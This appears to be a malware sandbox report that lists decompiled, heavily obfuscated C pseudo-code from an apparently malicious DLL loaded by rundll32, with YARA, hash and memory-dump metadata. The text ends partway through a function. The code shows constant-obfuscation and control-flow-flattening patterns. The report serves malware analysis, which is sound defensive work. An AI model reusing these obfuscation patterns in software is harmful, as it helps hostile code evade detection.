                                                                                                                                    			E002E0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				void* _t61;
                                                                                                                                    				intOrPtr _t66;
                                                                                                                                    				void* _t73;
                                                                                                                                    				intOrPtr* _t74;
                                                                                                                                    
                                                                                                                                    				_t74 = _a16;
                                                                                                                                    				_push(_t74);
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_t73 = __ecx;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t61);
                                                                                                                                    				_v16 = 0x2b4f5d;
                                                                                                                                    				_v16 = _v16 * 0x1c;
                                                                                                                                    				_v16 = _v16 >> 8;
                                                                                                                                    				_v16 = _v16 ^ 0x000abada;
                                                                                                                                    				_v24 = 0x6f176d;
                                                                                                                                    				_v24 = _v24 | 0x8892b5fd;
                                                                                                                                    				_v24 = _v24 ^ 0x88fd6dba;
                                                                                                                                    				_v12 = 0x9049ef;
                                                                                                                                    				_v12 = _v12 >> 4;
                                                                                                                                    				_v12 = _v12 ^ 0x7aa47b64;
                                                                                                                                    				_v12 = _v12 ^ 0x7aa68413;
                                                                                                                                    				_a16 = 0x9c064;
                                                                                                                                    				_a16 = _a16 + 0x4e6a;
                                                                                                                                    				_a16 = _a16 + 0xffffd44e;
                                                                                                                                    				_a16 = _a16 | 0x475ceb65;
                                                                                                                                    				_a16 = _a16 ^ 0x47532e3d;
                                                                                                                                    				_v8 = 0xaf6c6f;
                                                                                                                                    				_v8 = _v8 >> 6;
                                                                                                                                    				_v8 = _v8 + 0xad29;
                                                                                                                                    				_v8 = _v8 + 0xd52;
                                                                                                                                    				_v8 = _v8 ^ 0x000b7d9e;
                                                                                                                                    				_v20 = 0xd79f7b;
                                                                                                                                    				_v20 = _v20 ^ 0x214a9efd;
                                                                                                                                    				_v20 = _v20 >> 5;
                                                                                                                                    				_v20 = _v20 ^ 0x010f9d8f;
                                                                                                                                    				E002D0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
                                                                                                                                    				E002CED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                                                                                                    				_t66 =  *((intOrPtr*)(_t74 + 4));
                                                                                                                                    				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
                                                                                                                                    				return _t66;
                                                                                                                                    			}













                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: =.SG$]O+
                                                                                                                                    • API String ID: 0-348654084
                                                                                                                                    • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                    • Instruction ID: 266a4d4fe215b7b126b155644e95b55487d966ef3db6e3b7d46b7905db68b5e3
                                                                                                                                    • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                    • Instruction Fuzzy Hash: 1421347180120DEFCF05DFA5DA4A8AEBBB1FF45304F208599E92562224C3B19B24DFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog3
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                    • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                    • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                                    • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                    • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002D044F() {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				void* _t309;
                                                                                                                                    				intOrPtr _t310;
                                                                                                                                    				void* _t311;
                                                                                                                                    				intOrPtr _t321;
                                                                                                                                    				intOrPtr _t325;
                                                                                                                                    				void* _t329;
                                                                                                                                    				signed int _t331;
                                                                                                                                    				signed int _t332;
                                                                                                                                    				signed int _t333;
                                                                                                                                    				signed int _t334;
                                                                                                                                    				signed int _t335;
                                                                                                                                    				signed int _t336;
                                                                                                                                    				signed int _t337;
                                                                                                                                    				signed int _t338;
                                                                                                                                    				signed int _t339;
                                                                                                                                    				intOrPtr _t369;
                                                                                                                                    				void* _t373;
                                                                                                                                    				intOrPtr _t374;
                                                                                                                                    				void* _t379;
                                                                                                                                    				signed int* _t383;
                                                                                                                                    
                                                                                                                                    				_t383 =  &_v140;
                                                                                                                                    				_v16 = 0x8f0e94;
                                                                                                                                    				_v12 = 0x9bdfd3;
                                                                                                                                    				_t329 = 0;
                                                                                                                                    				_v8 = _v8 & 0;
                                                                                                                                    				_v4 = _v4 & 0;
                                                                                                                                    				_v68 = 0xf0a33d;
                                                                                                                                    				_v68 = _v68 ^ 0x64690d06;
                                                                                                                                    				_v68 = _v68 >> 7;
                                                                                                                                    				_v68 = _v68 ^ 0x00c9335c;
                                                                                                                                    				_v96 = 0x45a6c;
                                                                                                                                    				_v96 = _v96 + 0xffff2947;
                                                                                                                                    				_v96 = _v96 >> 0x10;
                                                                                                                                    				_v96 = _v96 ^ 0x00000003;
                                                                                                                                    				_v56 = 0xab09eb;
                                                                                                                                    				_v56 = _v56 | 0x7e070137;
                                                                                                                                    				_v56 = _v56 ^ 0x7eaf09ff;
                                                                                                                                    				_v80 = 0xa0f766;
                                                                                                                                    				_v80 = _v80 | 0xafeefcb7;
                                                                                                                                    				_v80 = _v80 ^ 0xafeefff7;
                                                                                                                                    				_v48 = 0xf26de0;
                                                                                                                                    				_v48 = _v48 + 0xffff1ff1;
                                                                                                                                    				_v48 = _v48 ^ 0x00f18dd1;
                                                                                                                                    				_v76 = 0x20d89d;
                                                                                                                                    				_v76 = _v76 + 0xffff51c8;
                                                                                                                                    				_v76 = _v76 | 0xd50d8457;
                                                                                                                                    				_v76 = _v76 ^ 0xd52cfd33;
                                                                                                                                    				_v136 = 0x1fce72;
                                                                                                                                    				_v136 = _v136 >> 0xe;
                                                                                                                                    				_v136 = _v136 | 0xd51e44d2;
                                                                                                                                    				_t331 = 7;
                                                                                                                                    				_v136 = _v136 / _t331;
                                                                                                                                    				_v136 = _v136 ^ 0x1e7b1fff;
                                                                                                                                    				_t379 = 0x1e2498b;
                                                                                                                                    				_v92 = 0x2fa0bb;
                                                                                                                                    				_v92 = _v92 >> 7;
                                                                                                                                    				_v92 = _v92 << 1;
                                                                                                                                    				_v92 = _v92 ^ 0x0000a534;
                                                                                                                                    				_v52 = 0x3913b;
                                                                                                                                    				_t332 = 0x4f;
                                                                                                                                    				_v52 = _v52 / _t332;
                                                                                                                                    				_v52 = _v52 ^ 0x00068b65;
                                                                                                                                    				_v104 = 0xfffd78;
                                                                                                                                    				_v104 = _v104 | 0x3b05e9e1;
                                                                                                                                    				_v104 = _v104 + 0x741e;
                                                                                                                                    				_v104 = _v104 ^ 0x7591a7da;
                                                                                                                                    				_v104 = _v104 ^ 0x4990882f;
                                                                                                                                    				_v84 = 0xe3d15a;
                                                                                                                                    				_v84 = _v84 << 8;
                                                                                                                                    				_v84 = _v84 ^ 0xbeb387df;
                                                                                                                                    				_v84 = _v84 ^ 0x5d62ae1e;
                                                                                                                                    				_v24 = 0xb3d42d;
                                                                                                                                    				_v24 = _v24 | 0x6ee5a57e;
                                                                                                                                    				_v24 = _v24 ^ 0x6efe8c67;
                                                                                                                                    				_v60 = 0x6708ad;
                                                                                                                                    				_v60 = _v60 + 0xd3fd;
                                                                                                                                    				_v60 = _v60 ^ 0x0061923e;
                                                                                                                                    				_v128 = 0x5551d4;
                                                                                                                                    				_t333 = 0x50;
                                                                                                                                    				_v128 = _v128 / _t333;
                                                                                                                                    				_t334 = 0x7a;
                                                                                                                                    				_v128 = _v128 / _t334;
                                                                                                                                    				_t335 = 0x7e;
                                                                                                                                    				_v128 = _v128 * 0x46;
                                                                                                                                    				_v128 = _v128 ^ 0x000c63e9;
                                                                                                                                    				_v28 = 0xd668f8;
                                                                                                                                    				_v28 = _v28 << 0x10;
                                                                                                                                    				_v28 = _v28 ^ 0x68f34519;
                                                                                                                                    				_v112 = 0x194a18;
                                                                                                                                    				_v112 = _v112 / _t335;
                                                                                                                                    				_v112 = _v112 | 0xa7c33fbe;
                                                                                                                                    				_t336 = 0x65;
                                                                                                                                    				_v112 = _v112 / _t336;
                                                                                                                                    				_v112 = _v112 ^ 0x01a285cf;
                                                                                                                                    				_v44 = 0xc79794;
                                                                                                                                    				_v44 = _v44 ^ 0x35aba003;
                                                                                                                                    				_v44 = _v44 ^ 0x356e5b19;
                                                                                                                                    				_v140 = 0x380362;
                                                                                                                                    				_t337 = 0x79;
                                                                                                                                    				_v140 = _v140 * 5;
                                                                                                                                    				_v140 = _v140 ^ 0x1d7b2daf;
                                                                                                                                    				_v140 = _v140 + 0x590f;
                                                                                                                                    				_v140 = _v140 ^ 0x1c6cd8ab;
                                                                                                                                    				_v120 = 0x1c8328;
                                                                                                                                    				_v120 = _v120 / _t337;
                                                                                                                                    				_t338 = 0xa;
                                                                                                                                    				_v120 = _v120 / _t338;
                                                                                                                                    				_v120 = _v120 | 0x9d020d0f;
                                                                                                                                    				_v120 = _v120 ^ 0x9d02076d;
                                                                                                                                    				_v124 = 0x55cbd6;
                                                                                                                                    				_v124 = _v124 >> 9;
                                                                                                                                    				_v124 = _v124 >> 0xc;
                                                                                                                                    				_v124 = _v124 >> 6;
                                                                                                                                    				_v124 = _v124 ^ 0x000fb83a;
                                                                                                                                    				_v132 = 0xf0ac8c;
                                                                                                                                    				_v132 = _v132 | 0x3804c269;
                                                                                                                                    				_v132 = _v132 >> 1;
                                                                                                                                    				_v132 = _v132 + 0xffff8da8;
                                                                                                                                    				_v132 = _v132 ^ 0x1c781e64;
                                                                                                                                    				_v88 = 0x7992e8;
                                                                                                                                    				_v88 = _v88 | 0xba3027fa;
                                                                                                                                    				_v88 = _v88 >> 9;
                                                                                                                                    				_v88 = _v88 ^ 0x0051fda0;
                                                                                                                                    				_v36 = 0x7aefbd;
                                                                                                                                    				_v36 = _v36 + 0xfffff4eb;
                                                                                                                                    				_v36 = _v36 ^ 0x0078a7fc;
                                                                                                                                    				_v40 = 0xf56b46;
                                                                                                                                    				_v40 = _v40 + 0xffff9ce0;
                                                                                                                                    				_v40 = _v40 ^ 0x00fe48d4;
                                                                                                                                    				_v108 = 0x27569f;
                                                                                                                                    				_v108 = _v108 + 0x2c0a;
                                                                                                                                    				_v108 = _v108 ^ 0xb442ac8c;
                                                                                                                                    				_v108 = _v108 ^ 0xdc856b2a;
                                                                                                                                    				_v108 = _v108 ^ 0x68e3c0da;
                                                                                                                                    				_v116 = 0xbcba21;
                                                                                                                                    				_v116 = _v116 << 0xd;
                                                                                                                                    				_v116 = _v116 << 8;
                                                                                                                                    				_v116 = _v116 >> 6;
                                                                                                                                    				_v116 = _v116 ^ 0x011b605a;
                                                                                                                                    				_v32 = 0x87c31e;
                                                                                                                                    				_v32 = _v32 ^ 0x05bc26b1;
                                                                                                                                    				_v32 = _v32 ^ 0x05363b16;
                                                                                                                                    				_v100 = 0x4be1cd;
                                                                                                                                    				_v100 = _v100 + 0xffff13dd;
                                                                                                                                    				_v100 = _v100 | 0xdbf19b4f;
                                                                                                                                    				_v100 = _v100 >> 7;
                                                                                                                                    				_v100 = _v100 ^ 0x01b90151;
                                                                                                                                    				_v64 = 0xb1223e;
                                                                                                                                    				_v64 = _v64 | 0xb1fef6fe;
                                                                                                                                    				_v64 = _v64 ^ 0xb1f65c82;
                                                                                                                                    				_v72 = 0x9ef2a7;
                                                                                                                                    				_v72 = _v72 * 0x66;
                                                                                                                                    				_v72 = _v72 + 0xffffefd1;
                                                                                                                                    				_v72 = _v72 ^ 0x3f51caaf;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					while(1) {
                                                                                                                                    						_t309 = 0x546d98;
                                                                                                                                    						do {
                                                                                                                                    							L3:
                                                                                                                                    							if(_t379 == _t309) {
                                                                                                                                    								_t310 =  *0x2e3e00; // 0x0
                                                                                                                                    								_t339 = _v56;
                                                                                                                                    								_t311 = E002D0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
                                                                                                                                    								_t383 =  &(_t383[6]);
                                                                                                                                    								__eflags = _t311 - _v80;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_t379 = 0x64eb485;
                                                                                                                                    									goto L14;
                                                                                                                                    								} else {
                                                                                                                                    									_t379 = 0xb6ab68a;
                                                                                                                                    									_t329 = 1;
                                                                                                                                    									goto L1;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t379 == 0x19763e8) {
                                                                                                                                    									_push(_v128);
                                                                                                                                    									_push(_v60);
                                                                                                                                    									__eflags = E002C9462(E002DDCF7(_v24, 0x2c17f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
                                                                                                                                    									_t339 = _v140;
                                                                                                                                    									_t379 =  ==  ? 0x546d98 : 0x64eb485;
                                                                                                                                    									E002CA8B0(_t339, _t313, _v120);
                                                                                                                                    									_t383 =  &(_t383[8]);
                                                                                                                                    									L14:
                                                                                                                                    									_t369 =  *0x2e3e00; // 0x0
                                                                                                                                    									_t309 = 0x546d98;
                                                                                                                                    									goto L15;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t379 == 0x1e2498b) {
                                                                                                                                    										_push(_t339);
                                                                                                                                    										_push(_t339);
                                                                                                                                    										_t373 = 0x28;
                                                                                                                                    										_t321 = E002C7FF2(_t373);
                                                                                                                                    										 *0x2e3e00 = _t321;
                                                                                                                                    										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
                                                                                                                                    										_t374 =  *0x2e3e00; // 0x0
                                                                                                                                    										_t325 = E002C7FF2( *((intOrPtr*)(_t374 + 0x14)));
                                                                                                                                    										_t369 =  *0x2e3e00; // 0x0
                                                                                                                                    										_t379 = 0x19763e8;
                                                                                                                                    										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
                                                                                                                                    										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
                                                                                                                                    										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
                                                                                                                                    										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
                                                                                                                                    										 *(_t369 + 4) = _t339;
                                                                                                                                    										_t309 = 0x546d98;
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t379 == 0x64eb485) {
                                                                                                                                    											E002D8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
                                                                                                                                    											E002D8519(_v64, _v72,  *0x2e3e00);
                                                                                                                                    										} else {
                                                                                                                                    											if(_t379 != 0xb6ab68a) {
                                                                                                                                    												goto L15;
                                                                                                                                    											} else {
                                                                                                                                    												E002C957D(_v20, _v40, _v108, _v48, _v116);
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L18:
                                                                                                                                    							return _t329;
                                                                                                                                    							L15:
                                                                                                                                    							__eflags = _t379 - 0xfde45c5;
                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                    						goto L18;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}


























































                                                                                                                                    0x002d09b1
                                                                                                                                    0x002d09b3
                                                                                                                                    0x002d09b8
                                                                                                                                    0x00000000
                                                                                                                                    0x002d09b8
                                                                                                                                    0x002d086c
                                                                                                                                    0x002d0872
                                                                                                                                    0x002d091a
                                                                                                                                    0x002d0923
                                                                                                                                    0x002d0963
                                                                                                                                    0x002d0967
                                                                                                                                    0x002d0970
                                                                                                                                    0x002d0973
                                                                                                                                    0x002d0978
                                                                                                                                    0x002d09c0
                                                                                                                                    0x002d09c0
                                                                                                                                    0x002d09c6
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0878
                                                                                                                                    0x002d087e
                                                                                                                                    0x002d08c7
                                                                                                                                    0x002d08c8
                                                                                                                                    0x002d08cb
                                                                                                                                    0x002d08cc
                                                                                                                                    0x002d08d1
                                                                                                                                    0x002d08d6
                                                                                                                                    0x002d08e9
                                                                                                                                    0x002d08f2
                                                                                                                                    0x002d08f7
                                                                                                                                    0x002d08fd
                                                                                                                                    0x002d0907
                                                                                                                                    0x002d0909
                                                                                                                                    0x002d090c
                                                                                                                                    0x002d090f
                                                                                                                                    0x002d0912
                                                                                                                                    0x002d085f
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0880
                                                                                                                                    0x002d0882
                                                                                                                                    0x002d09e7
                                                                                                                                    0x002d09fa
                                                                                                                                    0x002d0888
                                                                                                                                    0x002d088e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0894
                                                                                                                                    0x002d08ae
                                                                                                                                    0x002d08b3
                                                                                                                                    0x002d088e
                                                                                                                                    0x002d0882
                                                                                                                                    0x002d087e
                                                                                                                                    0x002d0872
                                                                                                                                    0x002d0a04
                                                                                                                                    0x002d0a0d
                                                                                                                                    0x002d09cb
                                                                                                                                    0x002d09cb
                                                                                                                                    0x002d09cb
                                                                                                                                    0x00000000
                                                                                                                                    0x002d09d7
                                                                                                                                    0x002d085f

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,
                                                                                                                                    • API String ID: 0-2314114710
                                                                                                                                    • Opcode ID: 01d66c70488e0504f87d05ebc1bf9a3b11e3cbb59d65889b7737ae892446ab76
                                                                                                                                    • Instruction ID: aee26dd4f8a21117fe0beaadc6d2e3f8060ae88525a0f5ac3c2acc6013122e6d
                                                                                                                                    • Opcode Fuzzy Hash: 01d66c70488e0504f87d05ebc1bf9a3b11e3cbb59d65889b7737ae892446ab76
                                                                                                                                    • Instruction Fuzzy Hash: 91E13F715183809FD368CF25D58AA0BBBF2BBC4718F608A1DF59A86260C7B1D959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Iconic
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 110040809-0
                                                                                                                                    • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                    • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                                    • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                    • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E002D9EEC() {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				char _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				char _v24;
                                                                                                                                    				char _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _t207;
                                                                                                                                    				intOrPtr _t209;
                                                                                                                                    				intOrPtr _t212;
                                                                                                                                    				intOrPtr _t214;
                                                                                                                                    				intOrPtr _t218;
                                                                                                                                    				void* _t219;
                                                                                                                                    				signed int _t221;
                                                                                                                                    				signed int _t222;
                                                                                                                                    				signed int _t223;
                                                                                                                                    				signed int _t224;
                                                                                                                                    				signed int _t225;
                                                                                                                                    				signed int _t257;
                                                                                                                                    				void* _t259;
                                                                                                                                    				char _t263;
                                                                                                                                    				void* _t264;
                                                                                                                                    				void* _t266;
                                                                                                                                    
                                                                                                                                    				_v64 = 0xd7ee0e;
                                                                                                                                    				_t257 = 0x22;
                                                                                                                                    				_v64 = _v64 / _t257;
                                                                                                                                    				_v64 = _v64 + 0x89a9;
                                                                                                                                    				_t219 = 0;
                                                                                                                                    				_v64 = _v64 ^ 0x0000b335;
                                                                                                                                    				_t259 = 0xb83ebc6;
                                                                                                                                    				_v96 = 0xf5dfb6;
                                                                                                                                    				_v96 = _v96 >> 6;
                                                                                                                                    				_t221 = 0x26;
                                                                                                                                    				_v96 = _v96 / _t221;
                                                                                                                                    				_t222 = 0x2d;
                                                                                                                                    				_v96 = _v96 * 0x58;
                                                                                                                                    				_v96 = _v96 ^ 0x000b9251;
                                                                                                                                    				_v60 = 0xd70e95;
                                                                                                                                    				_v60 = _v60 >> 9;
                                                                                                                                    				_v60 = _v60 + 0xffffe8b9;
                                                                                                                                    				_v60 = _v60 ^ 0x00062b78;
                                                                                                                                    				_v44 = 0xb641ac;
                                                                                                                                    				_v44 = _v44 / _t222;
                                                                                                                                    				_v44 = _v44 ^ 0x0002d028;
                                                                                                                                    				_v52 = 0xbf8457;
                                                                                                                                    				_t223 = 0x5d;
                                                                                                                                    				_v52 = _v52 / _t223;
                                                                                                                                    				_v52 = _v52 | 0xbb7661a2;
                                                                                                                                    				_v52 = _v52 ^ 0xbb710206;
                                                                                                                                    				_v80 = 0x47b11a;
                                                                                                                                    				_v80 = _v80 ^ 0xc2c4229c;
                                                                                                                                    				_t224 = 0x18;
                                                                                                                                    				_v80 = _v80 / _t224;
                                                                                                                                    				_v80 = _v80 + 0xffff1c96;
                                                                                                                                    				_v80 = _v80 ^ 0x08184a4c;
                                                                                                                                    				_v36 = 0x40dca8;
                                                                                                                                    				_v36 = _v36 + 0x3144;
                                                                                                                                    				_v36 = _v36 ^ 0x004d2780;
                                                                                                                                    				_v40 = 0xec5297;
                                                                                                                                    				_v40 = _v40 * 0x45;
                                                                                                                                    				_v40 = _v40 ^ 0x3fbac2f2;
                                                                                                                                    				_v72 = 0x18b121;
                                                                                                                                    				_v72 = _v72 >> 1;
                                                                                                                                    				_v72 = _v72 * 0x1e;
                                                                                                                                    				_v72 = _v72 + 0xfd79;
                                                                                                                                    				_v72 = _v72 ^ 0x0173ec5f;
                                                                                                                                    				_v76 = 0xd8cc67;
                                                                                                                                    				_v76 = _v76 >> 2;
                                                                                                                                    				_v76 = _v76 >> 0xd;
                                                                                                                                    				_v76 = _v76 * 0x23;
                                                                                                                                    				_v76 = _v76 ^ 0x000d42f3;
                                                                                                                                    				_v88 = 0x5f1bd9;
                                                                                                                                    				_v88 = _v88 + 0x89b3;
                                                                                                                                    				_v88 = _v88 ^ 0xee5f73f3;
                                                                                                                                    				_v88 = _v88 ^ 0xfa82a5ad;
                                                                                                                                    				_v88 = _v88 ^ 0x14801a76;
                                                                                                                                    				_v92 = 0x778c42;
                                                                                                                                    				_t225 = 0x6d;
                                                                                                                                    				_v92 = _v92 * 0x69;
                                                                                                                                    				_v92 = _v92 << 0xb;
                                                                                                                                    				_v92 = _v92 | 0xba472be1;
                                                                                                                                    				_v92 = _v92 ^ 0xfe7d7315;
                                                                                                                                    				_v56 = 0x5dd318;
                                                                                                                                    				_v56 = _v56 / _t257;
                                                                                                                                    				_v56 = _v56 << 0xc;
                                                                                                                                    				_v56 = _v56 ^ 0x2c2721c6;
                                                                                                                                    				_v84 = 0xd870dc;
                                                                                                                                    				_v84 = _v84 >> 0x10;
                                                                                                                                    				_v84 = _v84 | 0x1345b487;
                                                                                                                                    				_v84 = _v84 * 0x5a;
                                                                                                                                    				_v84 = _v84 ^ 0xc68bf031;
                                                                                                                                    				_v48 = 0x9a419e;
                                                                                                                                    				_v48 = _v48 | 0xfa3afde2;
                                                                                                                                    				_v48 = _v48 ^ 0xfabdbed6;
                                                                                                                                    				_v32 = 0x7a1ab;
                                                                                                                                    				_v32 = _v32 / _t225;
                                                                                                                                    				_v32 = _v32 ^ 0x000f5e95;
                                                                                                                                    				_v68 = 0x67bbab;
                                                                                                                                    				_v68 = _v68 + 0xffffccf8;
                                                                                                                                    				_v68 = _v68 ^ 0x5c1ded32;
                                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                                    				_v68 = _v68 ^ 0x4cb92f41;
                                                                                                                                    				_t263 = _v28;
                                                                                                                                    				_t258 = _v28;
                                                                                                                                    				goto L1;
                                                                                                                                    				do {
                                                                                                                                    					while(1) {
                                                                                                                                    						L1:
                                                                                                                                    						_t266 = _t259 - 0xc23b37f;
                                                                                                                                    						if(_t266 > 0) {
                                                                                                                                    							break;
                                                                                                                                    						}
